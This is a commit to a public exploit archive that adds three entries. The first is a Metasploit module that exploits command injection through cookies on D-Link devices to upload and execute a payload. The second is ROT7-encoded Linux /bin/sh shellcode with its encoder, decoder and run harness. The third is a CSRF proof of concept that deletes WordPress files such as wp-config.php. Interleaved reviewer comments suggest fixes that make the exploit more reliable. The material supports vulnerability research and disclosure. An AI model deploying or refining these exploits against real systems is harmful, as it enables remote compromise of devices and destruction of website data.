DB: 2015-07-18
3 new exploits
This commit is contained in:
parent
5454188b4e
commit
e4d0bdd544
4 changed files with 321 additions and 0 deletions
@ -33849,6 +33849,7 @@ id,file,description,date,author,platform,type,port
37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
37494,platforms/php/webapps/37494.txt,"Wordpress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0
37495,platforms/lin_x86/shellcode/37495.py,"Linux x86 /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0
37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-17,snup,php,webapps,0
37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin Arbitrary File Upload Vulnerability",2012-07-13,KedAns-Dz,php,webapps,0
37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board Multiple SQL Injection Vulnerabilities",2012-07-15,ToXiC,php,webapps,0
@ -33960,3 +33961,5 @@ id,file,description,date,author,platform,type,port
37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0
37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF Vulnerability",2015-07-17,"Tom Adams",php,webapps,80
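--- a/platforms/hardware/remote/37628.rb
+++ b/platforms/hardware/remote/37628.rb
@@ -0,0 +1,152 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::CmdStager
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'D-Link Cookie Command Execution',
+'Description' => %q{
+This module exploits an anonymous remote upload and code execution vulnerability on different
+D-Link devices. The vulnerability is a command injection in the cookie handling process of the
+lighttpd web server when handling specially crafted cookie values. This module has been
+successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
+},
+'Author' =>
+[
+'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
+'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'Platform' => 'linux',
+'References' =>
+[
+['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
+],
+'DisclosureDate' => 'Jun 12 2015',
+'Payload' =>
+{
+'DisableNops' => true
+},
+'Targets' =>
+[
+[ 'MIPS Little Endian', # unknown if there are LE devices out there ... but in case we have a target
+{
+'Platform' => 'linux',
+'Arch' => ARCH_MIPSLE
+}
+],
+[ 'MIPS Big Endian',
+{
+'Platform' => 'linux',
+'Arch' => ARCH_MIPSBE
+}
+]
+],
+'DefaultTarget' => 1
+))
+end
+
+def check
+begin
+res = send_request_cgi({
+'uri' => '/',
+'method' => 'GET'
+})
+
+if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
+return Exploit::CheckCode::Detected
+end
+rescue ::Rex::ConnectionError
+return Exploit::CheckCode::Unknown
+end
+
+Exploit::CheckCode::Unknown
+end
+
+def exploit
+print_status("#{peer} - Trying to access the device ...")
+
+unless check == Exploit::CheckCode::Detected
+fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+end
+
+print_status("#{peer} - Uploading stager ...")
+@counter = 1
+execute_cmdstager(
+:flavor => :echo,
+:linemax => 95 # limited by our upload, larger payloads crash the web server
+)
+
+print_status("#{peer} - creating payload and executing it ...")
+
+(1 .. @counter).each do |act_file|
+# the http server blocks access to our files ... we copy it to a new one
+# the length of our command is restricted to 19 characters
+cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
+execute_final_command(cmd)
+cmd = "chmod +x /tmp/#{act_file+@counter}"
+execute_final_command(cmd)
+cmd = "/tmp/#{act_file+@counter}"
+execute_final_command(cmd)
+cmd = "rm /tmp/#{act_file}"
+execute_final_command(cmd)
+cmd = "rm /tmp/#{act_file+@counter}"
+execute_final_command(cmd)
+end
+end
+
+def execute_command(cmd,opts)
+# upload our stager to a shell script
+# upload takes quite long because there is no response from the web server
+
+file_upload = "#!/bin/sh\n"
+file_upload << cmd << "\n"
+
+post_data = Rex::MIME::Message.new
+post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
+post_data.bound = "-#{rand_text_alpha(12)}--"
+file = post_data.to_s
+
+@counter = @counter + 1
+
+begin
+send_request_cgi({
+'method' => 'POST',
+'uri' => "/web_cgi.cgi",
+'vars_get' => {
+'&request' =>'UploadFile',
+'path' => '/tmp/'
+},
+'encode_params' => false,
+'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+'data' => file
+})
+rescue ::Rex::ConnectionError
+fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+end
+
+end
+
+def execute_final_command(cmd)
+# very limited space - larger commands crash the webserver
+fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
+begin
+send_request_cgi({
+'method' => 'GET',
+'uri' => "/",
+'cookie' => "i=`#{cmd}`"
+}, 5)
+rescue ::Rex::ConnectionError
+fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+end
+end
+end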
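Review bot: The execution loop `(1 .. @counter).each do |act_file|` in `exploit` runs one pass too many: `execute_command` names each uploaded chunk `filename=\"#{@counter}\"` and only then does `@counter = @counter + 1`, so once the stager is up the chunks are `/tmp/1` .. `/tmp/#{@counter - 1}` and the final iteration fires five cookie injections at a `/t*/#{@counter}` that was never uploaded (assuming CmdStager calls `execute_command` once per chunk, as the mixin does). An exclusive range fixes it, `(1 ... @counter).each do |act_file|`, and also avoids the extra `cp`/`rm` noise on a device the comments say crashes easily. The comment `# the length of our command is restricted to 19 characters` disagrees with the guard `cmd.length > 18` in `execute_final_command`, which rejects a 19-character command; change the comment to `restricted to 18 characters` so the limit is stated once. Note also that `check` matches only the `Server: lighttpd/1.4.34` banner and `exploit` proceeds on `Detected`, so any host with that banner will receive the multipart uploads to `/web_cgi.cgi`; that is consistent with what `Detected` means, but it is worth saying so in the description so operators do not read it as a vulnerability confirmation.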
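--- a/platforms/lin_x86/shellcode/37495.py
+++ b/platforms/lin_x86/shellcode/37495.py
@@ -0,0 +1,104 @@
+# Shellcode Title: ROT7
+# Date: 5 July 2015
+# Exploit Author: Artem Tsvetkov
+# Software Link:
+https://github.com/adeptex/SLAE/tree/master/Assignment-6/rot7
+# Tested on: Kali GNU/Linux 1.1.0
+# Platform: x86 Linux
+
+This code was created as an exercise for the SecurityTube Linux Assembly
+Expert (SLAE).
+
+The following will produce rot7-encoded shellcode using a custom scheme to
+dynamically set the shellcode length. The length is used by the decoder to
+determine when it should stop decoding.
+
+
+
+
+#!/usr/bin/python
+# Python ROT-7 Encoder
+# execve 24 bytes
+shellcode = (
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
+"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
+)
+
+# byte[0] == shellcode length
+encoded = "\\x%02x," % len(bytearray(shellcode))
+encoded2 = "0x%02x," % len(bytearray(shellcode))
+
+print 'Encoded shellcode ...'
+
+for x in bytearray(shellcode) :
+# boundary is computed as 255-ROT(x) where x, the amount to rotate by
+if x > 248:
+encoded += '\\x'
+encoded += '%02x' %(7 -(256 - x))
+encoded2 += '0x'
+encoded2 += '%02x,' %(7 -(256 - x))
+else:
+encoded += '\\x'
+encoded += '%02x'%(x+7)
+encoded2 += '0x'
+encoded2 += '%02x,' %(x+7)
+
+print '\n%s\n\n%s\n\nShellcode Length: %d\n' % (encoded, encoded2,
+len(bytearray(shellcode)))
+
+
+
+
+The following is the NASM decoder:
+
+
+; ROT7 NASM decoder
+global _start
+section .text
+_start:
+jmp short stage
+
+decoder:
+pop esi ; shellcode address
+mov al, byte [esi] ; shellcode length
+xor ecx, ecx ; position
+
+decode:
+mov bl, byte [esi+ecx+1] ; get rot'ed byted
+sub bl, 0x7 ; rot it back (-7)
+mov byte [esi+ecx], bl ; store it in shellcode
+inc ecx ; next position
+cmp al, cl ; check if reached the end of shellcode
+jnz short decode ; if not, continue derot'ing
+jmp shellcode ; else, execute derot'ed shellcode
+
+stage:
+call decoder
+
+; Shellcode Format:
+; byte[0] = length of shellcode (max 0xff)
+; byte[1..] = rot'ed shellcode
+shellcode: db
+0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87
+
+
+
+
+/*
+* Sample run
+*
+* Compile with: gcc rot7.c -o rot7
+*
+*/
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x16\x5e\x8a\x06\x31\xc9\x8a\x5c\x0e\x01\x80\xeb\x07\x88\x1c\x0e\x41\x38\xc8\x75\xf1\xeb\x05\xe8\xe5\xff\xff\xff\x18\x38\xc7\x57\x6f\x36\x36\x7a\x6f\x6f\x36\x69\x70\x75\x90\xea\x38\xd0\x90\xd1\x71\x12\x5f\xd4\x87";
+
+int main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}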
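Review bot: The sample harness is likely to fault on any toolchain that maps `.data` non-executable, because the decoder rewrites its own bytes in place (`mov byte [esi+ecx], bl`) and then jumps into them, and `code[]` is a plain global; the line `* Compile with: gcc rot7.c -o rot7` names no flag that makes that memory both writable and executable. State the build the author actually tested (the SLAE harness is usually built 32-bit with `-fno-stack-protector -z execstack`, but confirm) and add a comment that the decoder needs a writable, executable page, not just an executable one. In the encoder, the `if x > 248:` branch is a hand-written mod-256 wrap; `(x + 7) & 0xff` yields the same byte for every `x` in 0..255, drops the boundary comment, and will not silently break if the rotation amount is changed without updating the 248 threshold. The `cmp al, cl` / `jnz short decode` loop also means a payload longer than 255 bytes never terminates, which the `max 0xff` comment covers, so the encoder should refuse such input rather than emit a length byte that has wrapped.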
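--- a/platforms/php/webapps/37629.txt
+++ b/platforms/php/webapps/37629.txt
@@ -0,0 +1,62 @@
+Details
+================
+Software: BuddyPress Activity Plus
+Version: 1.5
+Homepage: http://wordpress.org/plugins/buddypress-activity-plus/
+Advisory report: https://security.dxw.com/advisories/csrf-and-arbitrary-file-deletion-in-buddypress-activity-plus-1-5/
+CVE: Awaiting assignment
+CVSS: 8.5 (High; AV:N/AC:L/Au:N/C:N/I:P/A:C)
+
+Description
+================
+CSRF and arbitrary file deletion in BuddyPress Activity Plus 1.5
+
+Vulnerability
+================
+An attacker can delete any file the PHP process can delete.
+For this to happen, a logged-in user would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.
+
+Proof of concept
+================
+Ensure your PHP user can do maximum damage:
+sudo chown www-data:www-data /var/vhosts/my-wordpress-site
+Visit a page containing this as a logged-in user and click submit:
+<form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php\">
+<input type=\"text\" name=\"action\" value=\"bpfb_remove_temp_images\">
+<input type=\"text\" name=\"data\" value=\"bpfb_photos[]=../../../../wp-config.php\">
+<input type=\"submit\">
+</form>
+If the server is set up so that the php user has more restricted permissions, then an attacker will at least be able to delete files from the uploads directory.
+Note that you can also delete as many things as you like at once – $_POST[‘data’] is run through parse_str() which parses it as a query string, so just keep adding “&bpfb_photos[]=path/to/file” to the end until you have all known files.
+There is an identical attack available only when BP Group Documents is also installed. Just replace “bpfb_remove_temp_images” with “bpfb_remove_temp_documents” and in data replace “bpfb_photos” with “bpfb_documents”.
+
+Mitigations
+================
+Upgrade to version 1.6.2 or later
+If this is not possible, ensure that the PHP user on the server does not have permission to delete files like wp-config.php.
+
+Disclosure policy
+================
+dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
+
+Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
+
+This vulnerability will be published if we do not receive a response to this report with 14 days.
+
+Timeline
+================
+
+2013-08-22: Discovered
+2015-07-13: Reported to vendor via contact form at https://premium.wpmudev.org/contact/
+2015-07-13: Requested CVE
+2015-07-13: Vendor responded
+2015-07-14: Vendor reported issue fixed
+2015-07-14: Published
+
+
+
+Discovered by dxw:
+================
+Tom Adams
+Please visit security.dxw.com for more information.
+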